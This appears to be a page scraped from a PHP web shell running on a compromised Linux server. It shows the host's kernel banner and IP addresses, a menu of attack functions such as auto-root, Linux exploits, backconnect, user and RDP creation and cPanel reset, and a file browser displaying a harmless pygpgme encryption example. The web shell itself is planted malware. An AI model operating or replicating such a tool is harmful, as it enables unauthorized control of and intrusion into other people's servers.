Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.17.76.174
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pygpgme-0.3 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
encrypt.py
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : encrypt.py
import gpgme try: from io import BytesIO except ImportError: from StringIO import StringIO as BytesIO ctx = gpgme.Context() ctx.armor = True key = ctx.get_key('B10A449E4CFB9A60A2DB996701AF93D991CFA34D') plain = BytesIO(b'Hello World\n') cipher = BytesIO() ctx.encrypt([key], 0, plain, cipher) print(cipher.getvalue())
Close